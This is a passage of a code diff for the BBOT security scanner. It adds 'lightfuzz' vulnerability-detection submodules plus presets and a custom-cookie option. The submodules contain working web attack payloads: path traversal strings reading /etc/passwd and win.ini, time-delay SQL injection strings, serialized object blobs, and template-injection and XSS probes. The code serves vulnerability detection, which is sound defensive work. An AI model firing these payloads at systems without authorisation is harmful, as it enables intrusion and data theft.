it can't be because the first byte was the correct padding, and we know it is not vulnerable + return False + if differ_count == 1: + return True + return False + + async def padding_oracle(self, probe_value, cookies): + data, encoding = self.format_agnostic_decode(probe_value) + possible_block_sizes = self.possible_block_sizes(len(data)) + + for block_size in possible_block_sizes: + padding_oracle_result = await self.padding_oracle_execute(data, encoding, block_size, cookies) + if padding_oracle_result is None: + self.lightfuzz.debug( + "still could be in a possible_first_byte situation - retrying with different first byte" + ) + padding_oracle_result = await self.padding_oracle_execute( + data, encoding, block_size, cookies, possible_first_byte=False + ) + + if padding_oracle_result is True: + context = f"Lightfuzz Cryptographic Probe Submodule detected a probable padding oracle vulnerability after manipulating parameter: [{self.event.data['name']}]" + self.results.append( + { + "type": "VULNERABILITY", + "severity": "HIGH", + "description": f"Padding Oracle Vulnerability. Block size: [{str(block_size)}] {self.metadata()}", + "context": context, + } + ) + + async def error_string_search(self, text_dict, baseline_text): + matching_techniques = set() + matching_strings = set() + + for label, text in text_dict.items(): + matched_strings = self.lightfuzz.helpers.string_scan(self.crypto_error_strings, text) + for m in matched_strings: + matching_strings.add(m) + matching_techniques.add(label) + context = f"Lightfuzz Cryptographic Probe Submodule detected a cryptographic error after manipulating parameter: [{self.event.data['name']}]" + if len(matching_strings) > 0: + false_positive_check = self.lightfuzz.helpers.string_scan(self.crypto_error_strings, baseline_text) + false_positive_matches = set(matched_strings) & set(false_positive_check) + if not false_positive_matches: + self.results.append( + { + "type": "FINDING", + "description": f"Possible Cryptographic Error. {self.metadata()} Strings: [{','.join(matching_strings)}] Detection Technique(s): [{','.join(matching_techniques)}]", + "context": context, + } + ) + self.lightfuzz.debug( + f"Aborting cryptographic error reporting - baseline_text already contained detected string(s) ({','.join(false_positive_check)})" + ) + + @staticmethod + def identify_hash_function(hash_bytes): + hash_length = len(hash_bytes) + hash_functions = { + 16: hashlib.md5, + 20: hashlib.sha1, + 32: hashlib.sha256, + 48: hashlib.sha384, + 64: hashlib.sha512, + } + + if hash_length in hash_functions: + return hash_functions[hash_length] + + async def fuzz(self): + + cookies = self.event.data.get("assigned_cookies", {}) + probe_value = self.incoming_probe_value(populate_empty=False) + + if not probe_value: + self.lightfuzz.debug( + f"The Cryptography Probe Submodule requires original value, aborting [{self.event.data['type']}] [{self.event.data['name']}]" + ) + return + + baseline_probe = await self.baseline_probe(cookies) + if not baseline_probe: + self.lightfuzz.warning(f"Couldn't get baseline_probe for url {self.event.data['url']}, aborting") + return + + try: + truncate_probe_value = self.modify_string(probe_value, action="truncate") + mutate_probe_value = self.modify_string(probe_value, action="mutate") + except ValueError as e: + self.lightfuzz.debug( + f"Encountered error modifying value for parameter [{self.event.data['name']}]: {e} , aborting" + ) + return + + # Basic crypanalysis + likely_crypto, possible_block_cipher = self.cryptanalysis(probe_value) + + if not likely_crypto: + self.lightfuzz.debug("Parameter value does not appear to be cryptographic, aborting tests") + return + + http_compare = self.compare_baseline(self.event.data["type"], probe_value, cookies) + + # Cryptographic Response Divergence Test + try: + arbitrary_probe = await self.compare_probe(http_compare, self.event.data["type"], "AAAAAAA", cookies) + truncate_probe = await self.compare_probe( + http_compare, self.event.data["type"], truncate_probe_value, cookies + ) + mutate_probe = await self.compare_probe(http_compare, self.event.data["type"], mutate_probe_value, cookies) + except HttpCompareError as e: + self.lightfuzz.warning(f"Encountered HttpCompareError Sending Compare Probe: {e}") + return + + confirmed_techniques = [] + if mutate_probe[0] is False and "body" in mutate_probe[1]: + if (http_compare.compare_body(mutate_probe[3].text, arbitrary_probe[3].text) is False) or mutate_probe[ + 3 + ].text == "": + confirmed_techniques.append("Single-byte Mutation") + + if mutate_probe[0] is False and "body" in mutate_probe[1]: + if (http_compare.compare_body(truncate_probe[3].text, arbitrary_probe[3].text) is False) or truncate_probe[ + 3 + ].text == "": + confirmed_techniques.append("Data Truncation") + + if confirmed_techniques: + context = f"Lightfuzz Cryptographic Probe Submodule detected a parameter ({self.event.data['name']}) to appears to drive a cryptographic operation" + self.results.append( + { + "type": "FINDING", + "description": f"Probable Cryptographic Parameter. {self.metadata()} Detection Technique(s): [{', '.join(confirmed_techniques)}]", + "context": context, + } + ) + + # Cryptographic Error String Test + await self.error_string_search( + {"truncate value": truncate_probe[3].text, "mutate value": mutate_probe[3].text}, baseline_probe.text + ) + + if confirmed_techniques or ( + "padding" in truncate_probe[3].text.lower() or "padding" in mutate_probe[3].text.lower() + ): + # Padding Oracle Test + + if possible_block_cipher: + self.lightfuzz.debug( + "Attempting padding oracle exploit since it looks like a block cipher and we have confirmed crypto" + ) + await self.padding_oracle(probe_value, cookies) + + # Hash identification / Potential Length extension attack + + data, encoding = CryptoLightfuzz.format_agnostic_decode(probe_value) + hash_function = self.identify_hash_function(data) + if hash_function: + hash_instance = hash_function() + # if there are any hash functions which match the length, we check the additional parameters to see if they cause identical changes + # this would indicate they are being used to generate the hash + if ( + hash_function + and "additional_params" in self.event.data.keys() + and self.event.data["additional_params"] + ): + for additional_param_name, additional_param_value in self.event.data["additional_params"].items(): + try: + additional_param_probe = await self.compare_probe( + http_compare, + self.event.data["type"], + probe_value, + cookies, + additional_params_override={additional_param_name: additional_param_value + "A"}, + ) + except HttpCompareError as e: + self.lightfuzz.warning(f"Encountered HttpCompareError Sending Compare Probe: {e}") + continue + # the additional parameter affects the potential hash parameter (suggesting its calculated in the hash) + if additional_param_probe[0] is False and (additional_param_probe[1] == mutate_probe[1]): + context = f"Lightfuzz Cryptographic Probe Submodule detected a parameter ({self.event.data['name']}) that is a likely a hash, which is connected to another parameter {additional_param_name})" + self.results.append( + { + "type": "FINDING", + "description": f"Possible {self.event.data['type']} parameter with {hash_instance.name.upper()} Hash as value. {self.metadata()}, linked to additional parameter [{additional_param_name}]", + "context": context, + } + ) diff --git a/bbot/modules/lightfuzz_submodules/path.py b/bbot/modules/lightfuzz_submodules/path.py new file mode 100644 index 0000000000..827af65f2f --- /dev/null +++ b/bbot/modules/lightfuzz_submodules/path.py @@ -0,0 +1,120 @@ +from .base import BaseLightfuzz +from bbot.errors import HttpCompareError + +import re +from urllib.parse import quote + + +class PathTraversalLightfuzz(BaseLightfuzz): + async def fuzz(self): + cookies = self.event.data.get("assigned_cookies", {}) + probe_value = self.incoming_probe_value(populate_empty=False) + if not probe_value: + self.lightfuzz.debug( + f"Path Traversal detection requires original value, aborting [{self.event.data['type']}] [{self.event.data['name']}]" + ) + return + + # Single dot traversal tolerance test + path_techniques = { + "single-dot traversal tolerance (no-encoding)": { + "singledot_payload": f"./a/../{probe_value}", + "doubledot_payload": f"../a/../{probe_value}", + }, + "single-dot traversal tolerance (no-encoding, leading slash)": { + "singledot_payload": f"/./a/../{probe_value}", + "doubledot_payload": f"/../a/../{probe_value}", + }, + "single-dot traversal tolerance (url-encoding)": { + "singledot_payload": quote(f"./a/../{probe_value}".encode(), safe=""), + "doubledot_payload": quote(f"../a/../{probe_value}".encode(), safe=""), + }, + "single-dot traversal tolerance (url-encoding, leading slash)": { + "singledot_payload": quote(f"/./a/../{probe_value}".encode(), safe=""), + "doubledot_payload": quote(f"/../a/../{probe_value}".encode(), safe=""), + }, + "single-dot traversal tolerance (non-recursive stripping)": { + "singledot_payload": f"...//a/....//{probe_value}", + "doubledot_payload": f"....//a/....//{probe_value}", + }, + "single-dot traversal tolerance (non-recursive stripping, leading slash)": { + "singledot_payload": f"/...//a/....//{probe_value}", + "doubledot_payload": f"/....//a/....//{probe_value}", + }, + "single-dot traversal tolerance (double url-encoding)": { + "singledot_payload": f".%252fa%252f..%252f{probe_value}", + "doubledot_payload": f"..%252fa%252f..%252f{probe_value}", + }, + "single-dot traversal tolerance (double url-encoding, leading slash)": { + "singledot_payload": f"%252f.%252fa%252f..%252f{probe_value}", + "doubledot_payload": f"%252f..%252fa%252f..%252f{probe_value}", + }, + } + + linux_path_regex = re.match(r"\/(?:\w+\/?)+\.\w+", probe_value) + if linux_path_regex is not None: + original_path_only = "/".join(probe_value.split("/")[:-1]) + original_filename_only = probe_value.split("/")[-1] + path_techniques["single-dot traversal tolerance (start of path validation)"] = { + "singledot_payload": f"{original_path_only}/./{original_filename_only}", + "doubledot_payload": f"{original_path_only}/../{original_filename_only}", + } + + for path_technique, payloads in path_techniques.items(): + iterations = 5 # one failed detection is tolerated, as long as its not the first run + confirmations = 0 + while iterations > 0: + try: + http_compare = self.compare_baseline(self.event.data["type"], probe_value, cookies) + singledot_probe = await self.compare_probe( + http_compare, self.event.data["type"], payloads["singledot_payload"], cookies + ) + doubledot_probe = await self.compare_probe( + http_compare, self.event.data["type"], payloads["doubledot_payload"], cookies + ) + + if ( + singledot_probe[0] is True + and doubledot_probe[0] is False + and doubledot_probe[3] is not None + and doubledot_probe[1] != ["header"] + and "The requested URL was rejected" not in doubledot_probe[3].text + ): + confirmations += 1 + self.lightfuzz.verbose( + f"Got possible Path Traversal detection: [{str(confirmations)}] Confirmations" + ) + if confirmations > 3: + self.results.append( + { + "type": "FINDING", + "description": f"POSSIBLE Path Traversal. {self.metadata()} Detection Method: [{path_technique}]", + } + ) + # no need to report both techniques if they both work + break + except HttpCompareError as e: + iterations -= 1 + self.lightfuzz.debug(e) + continue + + iterations -= 1 + if confirmations == 0: + break + + # Absolute path test + absolute_paths = { + r"c:\\windows\\win.ini": "; for 16-bit app support", + "/etc/passwd": "daemon:x:", + "../../../../../etc/passwd%00.png": "daemon:x:", + } + + for path, trigger in absolute_paths.items(): + r = await self.standard_probe(self.event.data["type"], cookies, path) + if r and trigger in r.text: + self.results.append( + { + "type": "FINDING", + "description": f"POSSIBLE Path Traversal. {self.metadata()} Detection Method: [Absolute Path: {path}]", + } + ) diff --git a/bbot/modules/lightfuzz_submodules/serial.py b/bbot/modules/lightfuzz_submodules/serial.py new file mode 100644 index 0000000000..e6cf2da765 --- /dev/null +++ b/bbot/modules/lightfuzz_submodules/serial.py @@ -0,0 +1,66 @@ +from .base import BaseLightfuzz +from bbot.errors import HttpCompareError + + +class SerialLightfuzz(BaseLightfuzz): + async def fuzz(self): + cookies = self.event.data.get("assigned_cookies", {}) + control_payload = "DEADBEEFCAFEBABE1234567890ABCDEF" + serialization_payloads = { + "php_base64": "YTowOnt9", + "php_raw": "a:0:{}", + "java_hex": "ACED00057372000E6A6176612E6C616E672E426F6F6C65616ECD207EC0D59CF6EE02000157000576616C7565787000", + "java_base64": "rO0ABXNyABFqYXZhLmxhbmcuQm9vbGVhbs0gcoDVnPruAgABWgAFdmFsdWV4cAA=", + "java_base64_string_error": "rO0ABXQABHRlc3Q=", + "java_base64_OptionalDataException": "rO0ABXcEAAAAAAEAAAABc3IAEGphdmEudXRpbC5IYXNoTWFwAAAAAAAAAAECAAJMAARrZXkxYgABAAAAAAAAAAJ4cHcBAAAAB3QABHRlc3Q=", + "java_hex_OptionalDataException": "ACED0005737200106A6176612E7574696C2E486173684D617000000000000000012000014C00046B6579317A00010000000000000278707000000774000474657374", + "dotnet_hex": "0001000000ffffffff01000000000000000601000000076775737461766f0b", + "dotnet_base64": "AAEAAAD/////AQAAAAAAAAAGAQAAAAdndXN0YXZvCw==", + "ruby_base64": "BAh7BjoKbE1FAAVJsg==", + } + + serialization_errors = [ + "invalid user", + "cannot cast java.lang.string", + "dump format error", + "java.io.optionaldataexception", + ] + + probe_value = self.incoming_probe_value(populate_empty=False) + if probe_value: + self.lightfuzz.debug( + f"The Serialization Submodule only operates when there if no original value, aborting [{self.event.data['type']}] [{self.event.data['name']}]" + ) + return + + http_compare = self.compare_baseline(self.event.data["type"], control_payload, cookies) + for type, payload in serialization_payloads.items(): + try: + serialization_probe = await self.compare_probe(http_compare, self.event.data["type"], payload, cookies) + if serialization_probe[0] is False and serialization_probe[1] != ["header"]: + if ( + serialization_probe[3].status_code == 200 + and "code" in serialization_probe[1] + and "The requested URL was rejected" not in serialization_probe[3].text + ): + self.results.append( + { + "type": "FINDING", + "description": f"POSSIBLE Unsafe Deserialization. {self.metadata()} Technique: [Error Resolution] Serialization Payload: [{type}]", + } + ) + elif serialization_probe[3].status_code == 500 or ( + serialization_probe[3].status_code == 200 and serialization_probe[1] == ["body"] + ): + for serialization_error in serialization_errors: + if serialization_error in serialization_probe[3].text.lower(): + self.results.append( + { + "type": "FINDING", + "description": f"POSSIBLE Unsafe Deserialization. {self.metadata()} Technique: [Differential Error Analysis] Error-String: [{serialization_error}] Payload: [{type}]", + } + ) + break + except HttpCompareError as e: + self.lightfuzz.debug(e) + continue diff --git a/bbot/modules/lightfuzz_submodules/sqli.py b/bbot/modules/lightfuzz_submodules/sqli.py new file mode 100644 index 0000000000..1f7d677cce --- /dev/null +++ b/bbot/modules/lightfuzz_submodules/sqli.py @@ -0,0 +1,139 @@ +from .base import BaseLightfuzz +from bbot.errors import HttpCompareError + +import statistics + + +class SQLiLightfuzz(BaseLightfuzz): + expected_delay = 5 + sqli_error_strings = [ + "Unterminated string literal", + "Failed to parse string literal", + "error in your SQL syntax", + "syntax error at or near", + "Unknown column", + "unterminated quoted string", + "Unclosed quotation mark", + "Incorrect syntax near", + "SQL command not properly ended", + "string not properly terminated", + ] + + def evaluate_delay(self, mean_baseline, measured_delay): + margin = 1.5 + if ( + mean_baseline + self.expected_delay - margin + <= measured_delay + <= mean_baseline + self.expected_delay + margin + ): + return True + # check for exactly twice the delay, in case the statement gets placed in the query twice + elif ( + mean_baseline + (self.expected_delay * 2) - margin + <= measured_delay + <= mean_baseline + (self.expected_delay * 2) + margin + ): + return True + else: + return False + + async def fuzz(self): + cookies = self.event.data.get("assigned_cookies", {}) + probe_value = self.incoming_probe_value(populate_empty=True) + http_compare = self.compare_baseline( + self.event.data["type"], probe_value, cookies, additional_params_populate_empty=True + ) + + try: + single_quote = await self.compare_probe( + http_compare, + self.event.data["type"], + f"{probe_value}'", + cookies, + additional_params_populate_empty=True, + ) + double_single_quote = await self.compare_probe( + http_compare, + self.event.data["type"], + f"{probe_value}''", + cookies, + additional_params_populate_empty=True, + ) + + if single_quote[0] is False: + for sqli_error_string in self.sqli_error_strings: + if sqli_error_string.lower() in single_quote[3].text.lower(): + self.results.append( + { + "type": "FINDING", + "description": f"Possible SQL Injection. {self.metadata()} Detection Method: [SQL Error Detection] Detected String: [{sqli_error_string}]", + } + ) + break + + if single_quote[3] and double_single_quote[3]: + if "code" in single_quote[1] and (single_quote[3].status_code != double_single_quote[3].status_code): + self.results.append( + { + "type": "FINDING", + "description": f"Possible SQL Injection. {self.metadata()} Detection Method: [Single Quote/Two Single Quote]", + } + ) + else: + self.lightfuzz.debug("Failed to get responses for both single_quote and double_single_quote") + except HttpCompareError as e: + self.lightfuzz.warning(f"Encountered HttpCompareError Sending Compare Probe: {e}") + + standard_probe_strings = [ + f"'||pg_sleep({str(self.expected_delay)})--", # postgres + f"1' AND (SLEEP({str(self.expected_delay)})) AND '", # mysql + f"' AND (SELECT FROM DBMS_LOCK.SLEEP({str(self.expected_delay)})) AND '1'='1" # oracle (not tested) + f"; WAITFOR DELAY '00:00:{str(self.expected_delay)}'--", # mssql (not tested) + ] + + baseline_1 = await self.standard_probe( + self.event.data["type"], cookies, probe_value, additional_params_populate_empty=True + ) + baseline_2 = await self.standard_probe( + self.event.data["type"], cookies, probe_value, additional_params_populate_empty=True + ) + + if baseline_1 and baseline_2: + baseline_1_delay = baseline_1.elapsed.total_seconds() + baseline_2_delay = baseline_2.elapsed.total_seconds() + mean_baseline = statistics.mean([baseline_1_delay, baseline_2_delay]) + + for p in standard_probe_strings: + confirmations = 0 + for i in range(0, 3): + r = await self.standard_probe( + self.event.data["type"], + cookies, + f"{probe_value}{p}", + additional_params_populate_empty=True, + timeout=20, + ) + if not r: + self.lightfuzz.debug("delay measure request failed") + break + + d = r.elapsed.total_seconds() + self.lightfuzz.debug(f"measured delay: {str(d)}") + if self.evaluate_delay(mean_baseline, d): + confirmations += 1 + self.lightfuzz.debug( + f"{self.event.data['url']}:{self.event.data['name']}:{self.event.data['type']} Increasing confirmations, now: {str(confirmations)} " + ) + else: + break + + if confirmations == 3: + self.results.append( + { + "type": "FINDING", + "description": f"Possible Blind SQL Injection. {self.metadata()} Detection Method: [Delay Probe ({p})]", + } + ) + + else: + self.lightfuzz.debug("Could not get baseline for time-delay tests") diff --git a/bbot/modules/lightfuzz_submodules/ssti.py b/bbot/modules/lightfuzz_submodules/ssti.py new file mode 100644 index 0000000000..766356b583 --- /dev/null +++ b/bbot/modules/lightfuzz_submodules/ssti.py @@ -0,0 +1,18 @@ +from .base import BaseLightfuzz + + +class SSTILightfuzz(BaseLightfuzz): + async def fuzz(self): + + cookies = self.event.data.get("assigned_cookies", {}) + ssti_probes = ["<%25%3d%201337*1337%20%25>","<%= 1337*1337 %>", "${1337*1337}", "%24%7b1337*1337%7d", "1,787{{z}},569"] + for probe_value in ssti_probes: + r = await self.standard_probe(self.event.data["type"], cookies, probe_value, allow_redirects=True) + if r and ("1787569" in r.text or "1,787,569" in r.text): + self.results.append( + { + "type": "FINDING", + "description": f"POSSIBLE Server-side Template Injection. {self.metadata()} Detection Method: [Integer Multiplication] Payload: [{probe_value}]", + } + ) + break \ No newline at end of file diff --git a/bbot/modules/lightfuzz_submodules/xss.py b/bbot/modules/lightfuzz_submodules/xss.py new file mode 100644 index 0000000000..9ac606e488 --- /dev/null +++ b/bbot/modules/lightfuzz_submodules/xss.py @@ -0,0 +1,102 @@ +from .base import BaseLightfuzz + +import re + + +class XSSLightfuzz(BaseLightfuzz): + def determine_context(self, cookies, html, random_string): + between_tags = False + in_tag_attribute = False + in_javascript = False + + between_tags_regex = re.compile(rf"<(\/?\w+)[^>]*>.*?{random_string}.*?<\/?\w+>") + in_tag_attribute_regex = re.compile(rf'<(\w+)\s+[^>]*?(\w+)="([^"]*?{random_string}[^"]*?)"[^>]*>') + in_javascript_regex = re.compile( + rf"]*>(?:(?!<\/script>)[\s\S])*?{random_string}(?:(?!<\/script>)[\s\S])*?<\/script>" + ) + + between_tags_match = re.search(between_tags_regex, html) + if between_tags_match: + between_tags = True + + in_tag_attribute_match = re.search(in_tag_attribute_regex, html) + if in_tag_attribute_match: + in_tag_attribute = True + + in_javascript_regex = re.search(in_javascript_regex, html) + if in_javascript_regex: + in_javascript = True + + return between_tags, in_tag_attribute, in_javascript + + async def check_probe(self, cookies, probe, match, context): + probe_result = await self.standard_probe(self.event.data["type"], cookies, probe) + if probe_result and match in probe_result.text: + self.results.append( + { + "type": "FINDING", + "description": f"Possible Reflected XSS. Parameter: [{self.event.data['name']}] Context: [{context}] Parameter Type: [{self.event.data['type']}]", + } + ) + return True + return False + + async def fuzz(self): + + lightfuzz_event = self.event.parent + cookies = self.event.data.get("assigned_cookies", {}) + + # If this came from paramminer_getparams and didn't have a http_reflection tag, we don't need to check again + if ( + lightfuzz_event.type == "WEB_PARAMETER" + and str(lightfuzz_event.module) == "paramminer_getparams" + and "http-reflection" not in lightfuzz_event.tags + ): + self.lightfuzz.debug( + "Got WEB_PARAMETER from paramminer, with no reflection tag - xss is not possible, aborting" + ) + return + + reflection = None + random_string = self.lightfuzz.helpers.rand_string(8) + + reflection_probe_result = await self.standard_probe(self.event.data["type"], cookies, random_string) + if reflection_probe_result and random_string in reflection_probe_result.text: + reflection = True + + if not reflection or reflection is False: + return + + between_tags, in_tag_attribute, in_javascript = self.determine_context(cookies, reflection_probe_result.text, random_string) + self.lightfuzz.debug( + f"determine_context returned: between_tags [{between_tags}], in_tag_attribute [{in_tag_attribute}], in_javascript [{in_javascript}]" + ) + tags = ["z", "svg", "img"] + if between_tags: + for tag in tags: + between_tags_probe = f"<{tag}>{random_string}" + result = await self.check_probe(cookies, between_tags_probe, between_tags_probe, f"Between Tags ({tag} tag)") + if result is True: + break + + if in_tag_attribute: + in_tag_attribute_probe = f'{random_string}"' + in_tag_attribute_match = f'"{random_string}""' + await self.check_probe(cookies, in_tag_attribute_probe, in_tag_attribute_match, "Tag Attribute") + + + in_tag_attribute_probe = f'javascript:{random_string}' + in_tag_attribute_match = f'action="javascript:{random_string}' + await self.check_probe(cookies, in_tag_attribute_probe, in_tag_attribute_match, "Form Action Injection") + + if in_javascript: + in_javascript_probe = rf"" + result = await self.check_probe(cookies, in_javascript_probe, in_javascript_probe, "In Javascript") + if result is False: + in_javasscript_escape_probe = rf"a\';zzzzz({random_string})\\" + in_javasscript_escape_match = rf"a\\';zzzzz({random_string})\\" + await self.check_probe(cookies, + in_javasscript_escape_probe, + in_javasscript_escape_match, + "In Javascript (escaping the escape character)", + ) diff --git a/bbot/modules/paramminer_headers.py b/bbot/modules/paramminer_headers.py index 723bffc2e0..c5a7a4f7a2 100644 --- a/bbot/modules/paramminer_headers.py +++ b/bbot/modules/paramminer_headers.py @@ -148,6 +148,7 @@ async def process_results(self, event, results): "type": paramtype, "description": description, "name": result, + "original_value": None, }, "WEB_PARAMETER", event, diff --git a/bbot/modules/reflected_parameters.py b/bbot/modules/reflected_parameters.py new file mode 100644 index 0000000000..d13b67dad5 --- /dev/null +++ b/bbot/modules/reflected_parameters.py @@ -0,0 +1,40 @@ +from bbot.modules.base import BaseModule + + +class reflected_parameters(BaseModule): + watched_events = ["WEB_PARAMETER"] + produced_events = ["FINDING"] + flags = ["active", "safe", "web-thorough"] + meta = { + "description": "Highlight parameters that reflect their contents in response body", + "author": "@liquidsec", + "created_date": "2024-10-29", + } + + async def handle_event(self, event): + url = event.data.get("url") + from_paramminer = str(event.module) == "paramminer_getparams" + reflection_detected = ( + "http-reflection" in event.tags if from_paramminer else await self.detect_reflection(event, url) + ) + + if reflection_detected: + description = ( + f"GET Parameter value reflected in response body. Name: [{event.data['name']}] " + f"Source Module: [{str(event.module)}]" + ) + if event.data.get("original_value"): + description += ( + f" Original Value: [{self.helpers.truncate_string(str(event.data['original_value']), 200)}]" + ) + data = {"host": str(event.host), "description": description, "url": url} + await self.emit_event(data, "FINDING", event) + + async def detect_reflection(self, event, url): + """Detects reflection by sending a probe with a random value.""" + probe_parameter_name = event.data["name"] + probe_parameter_value = self.helpers.rand_string() + probe_url = self.helpers.add_get_params(url, {probe_parameter_name: probe_parameter_value}).geturl() + self.debug(f"reflected_parameters Probe URL: {probe_url}") + probe_response = await self.helpers.request(probe_url, method="GET") + return probe_response and probe_parameter_value in probe_response.text diff --git a/bbot/presets/web/lightfuzz-intense.yml b/bbot/presets/web/lightfuzz-intense.yml new file mode 100644 index 0000000000..f2ceb2522b --- /dev/null +++ b/bbot/presets/web/lightfuzz-intense.yml @@ -0,0 +1,30 @@ +description: Discovery web parameters and lightly fuzz them for vulnerabilities, with more intense discovery techniques + +flags: + - web-paramminer + +modules: + - httpx + - lightfuzz + - robots + - badsecrets + - hunt + - reflected_parameters + +config: + url_querystring_remove: False + url_querystring_collapse: True + web: + spider_distance: 4 + spider_depth: 5 + modules: + lightfuzz: + force_common_headers: False + enabled_submodules: [cmdi,crypto,path,serial,sqli,ssti,xss] + disable_post: False + excavate: + retain_querystring: True + +blacklist: + # Prevent spider from invalidating sessions by logging out + - "RE:/.*(sign|log)[_-]?out" \ No newline at end of file diff --git a/bbot/presets/web/lightfuzz-max.yml b/bbot/presets/web/lightfuzz-max.yml new file mode 100644 index 0000000000..6a7530c321 --- /dev/null +++ b/bbot/presets/web/lightfuzz-max.yml @@ -0,0 +1,30 @@ +description: Discovery web parameters and lightly fuzz them for vulnerabilities, with more intense discovery techniques + +flags: + - web-paramminer + +modules: + - httpx + - lightfuzz + - robots + - badsecrets + - hunt + - reflected_parameters + +config: + url_querystring_remove: False + url_querystring_collapse: False + web: + spider_distance: 4 + spider_depth: 5 + modules: + lightfuzz: + force_common_headers: True + enabled_submodules: [cmdi,crypto,path,serial,sqli,ssti,xss] + disable_post: False + excavate: + retain_querystring: True + +blacklist: + # Prevent spider from invalidating sessions by logging out + - "RE:/.*(sign|log)[_-]?out" \ No newline at end of file diff --git a/bbot/presets/web/lightfuzz-ssti-test.yml b/bbot/presets/web/lightfuzz-ssti-test.yml new file mode 100644 index 0000000000..1b7674d98c --- /dev/null +++ b/bbot/presets/web/lightfuzz-ssti-test.yml @@ -0,0 +1,28 @@ +description: Discovery web parameters and lightly fuzz them for vulnerabilities, with more intense discovery techniques + +modules: + - httpx + - lightfuzz + - robots + - badsecrets + - hunt + - reflected_parameters + +blacklist: + # Prevent spider from invalidating sessions by logging out + - "RE:/.*(sign|log)[_-]?out" + +config: + url_querystring_remove: False + url_querystring_collapse: True + web: + spider_distance: 6 + spider_depth: 7 + modules: + lightfuzz: + force_common_headers: False + enabled_submodules: [ssti] + disable_post: False + excavate: + retain_querystring: True + diff --git a/bbot/presets/web/lightfuzz-xss.yml b/bbot/presets/web/lightfuzz-xss.yml new file mode 100644 index 0000000000..d3c9755ee0 --- /dev/null +++ b/bbot/presets/web/lightfuzz-xss.yml @@ -0,0 +1,21 @@ +description: Discovery web parameters and lightly fuzz them for xss vulnerabilities +modules: + - httpx + - lightfuzz + - paramminer_getparams + - reflected_parameters + +config: + url_querystring_remove: False + url_querystring_collapse: False + web: + spider_distance: 4 + spider_depth: 5 + modules: + lightfuzz: + enabled_submodules: [xss] + disable_post: True + +blacklist: + # Prevent spider from invalidating sessions by logging out + - "RE:/.*(sign|log)[_-]?out" \ No newline at end of file diff --git a/bbot/presets/web/lightfuzz.yml b/bbot/presets/web/lightfuzz.yml new file mode 100644 index 0000000000..1c48c668ba --- /dev/null +++ b/bbot/presets/web/lightfuzz.yml @@ -0,0 +1,26 @@ +description: Discovery web parameters and lightly fuzz them for vulnerabilities, without some of the more intense discovery techniques + +modules: + - httpx + - lightfuzz + - badsecrets + - hunt + - reflected_parameters + +config: + url_querystring_remove: False + url_querystring_collapse: True + web: + spider_distance: 3 + spider_depth: 4 + modules: + lightfuzz: + force_common_headers: False + enabled_submodules: [cmdi,crypto,path,serial,sqli,ssti,xss] + disable_post: True + excavate: + retain_querystring: True + +blacklist: + # Prevent spider from invalidating sessions by logging out + - "RE:/.*(sign|log)[_-]?out" \ No newline at end of file diff --git a/bbot/presets/web/paramminer.yml b/bbot/presets/web/paramminer.yml index 7d36e3a849..442cb37aa1 100644 --- a/bbot/presets/web/paramminer.yml +++ b/bbot/presets/web/paramminer.yml @@ -5,8 +5,17 @@ flags: modules: - httpx + - reflected_parameters config: web: spider_distance: 1 spider_depth: 4 + + omit_event_types: + - HTTP_RESPONSE + - RAW_TEXT + - URL_UNVERIFIED + - DNS_NAME_UNRESOLVED + - FILESYSTEM + - RAW_DNS_RECORD diff --git a/bbot/scanner/preset/args.py b/bbot/scanner/preset/args.py index 13723ea01d..ffb0dbe3a8 100644 --- a/bbot/scanner/preset/args.py +++ b/bbot/scanner/preset/args.py @@ -161,6 +161,9 @@ def preset_from_args(self): if self.parsed.custom_headers: args_preset.core.merge_custom({"web": {"http_headers": self.parsed.custom_headers}}) + if self.parsed.custom_cookies: + args_preset.core.merge_custom({"web": {"http_cookies": self.parsed.custom_cookies}}) + if self.parsed.custom_yara_rules: args_preset.core.merge_custom( {"modules": {"excavate": {"custom_yara_rules": self.parsed.custom_yara_rules}}} @@ -339,6 +342,13 @@ def create_parser(self, *args, **kwargs): default=[], help="List of custom headers as key value pairs (header=value).", ) + misc.add_argument( + "-C", + "--custom-cookies", + nargs="+", + default=[], + help="List of custom cookies as key value pairs (cookie=value).", + ) misc.add_argument("--custom-yara-rules", "-cy", help="Add custom yara rules to excavate") return p @@ -381,6 +391,22 @@ def sanitize_args(self): custom_headers_dict[k] = v self.parsed.custom_headers = custom_headers_dict + # Custom Cookie Parsing / Validation + custom_cookies_dict = {} + custom_cookie_example = "Example: --custom-cookies foo=bar foo2=bar2" + + for i in self.parsed.custom_cookies: + parts = i.split("=", 1) + if len(parts) != 2: + raise ValidationError(f"Custom cookies not formatted correctly (missing '='). {custom_cookie_example}") + k, v = parts + if not k or not v: + raise ValidationError( + f"Custom cookies not formatted correctly (missing cookie name or value). {custom_cookie_example}" + ) + custom_cookies_dict[k] = v + self.parsed.custom_cookies = custom_cookies_dict + # --fast-mode if self.parsed.fast_mode: self.parsed.preset += ["fast"] diff --git a/bbot/scanner/scanner.py b/bbot/scanner/scanner.py index 3817f26b21..2036b9d1ff 100644 --- a/bbot/scanner/scanner.py +++ b/bbot/scanner/scanner.py @@ -213,6 +213,12 @@ def __init__( self.warning( "You have enabled custom HTTP headers. These will be attached to all in-scope requests and all requests made by httpx." ) + # custom HTTP cookies warning + self.custom_http_cookies = self.web_config.get("http_cookies", {}) + if self.custom_http_cookies: + self.warning( + "You have enabled custom HTTP cookies. These will be attached to all in-scope requests and all requests made by httpx." + ) # url file extensions self.url_extension_blacklist = {e.lower() for e in self.config.get("url_extension_blacklist", [])} diff --git a/bbot/test/test_step_1/test_helpers.py b/bbot/test/test_step_1/test_helpers.py index 9cec291941..12fb15278f 100644 --- a/bbot/test/test_step_1/test_helpers.py +++ b/bbot/test/test_step_1/test_helpers.py @@ -460,6 +460,13 @@ async def test_helpers_misc(helpers, scan, bbot_scanner, bbot_httpserver): s = "asdf {unused} {used}" assert helpers.safe_format(s, used="fdsa") == "asdf {unused} fdsa" + # is_printable + assert helpers.is_printable("asdf") is True + assert helpers.is_printable(r"""~!@#$^&*()_+=-<>:"?,./;'[]\{}|""") is True + assert helpers.is_printable("ドメイン.テスト") is True + assert helpers.is_printable("4") is True + assert helpers.is_printable("asdf\x00") is False + # punycode assert helpers.smart_encode_punycode("ドメイン.テスト") == "xn--eckwd4c7c.xn--zckzah" assert helpers.smart_decode_punycode("xn--eckwd4c7c.xn--zckzah") == "ドメイン.テスト" diff --git a/bbot/test/test_step_1/test_web.py b/bbot/test/test_step_1/test_web.py index e07ed3d7d4..4d324abced 100644 --- a/bbot/test/test_step_1/test_web.py +++ b/bbot/test/test_step_1/test_web.py @@ -478,3 +478,24 @@ async def 